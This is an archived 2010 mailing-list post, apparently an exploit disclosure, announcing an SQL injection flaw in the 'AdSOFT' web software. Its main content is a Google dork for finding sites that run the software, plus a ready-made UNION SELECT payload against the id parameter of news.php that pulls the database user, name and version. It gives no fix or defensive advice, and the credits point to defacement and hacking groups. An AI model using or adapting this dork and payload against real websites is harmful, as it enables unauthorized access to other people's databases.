|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Adsoft Remote Sql Injection Vulnerability
md.r00t.defacer
gmail.com
Date: Thu Nov 04 2010 - 02:50:03 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
#------------In The Name Of God------------
# Adsoft Remote Sql Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer
gmail.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by AdSOFT"
###################################
# Exploit:
#
www.site.com/news.php?id=-999/**/union/**/select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6--
#
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team
*****************************************
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]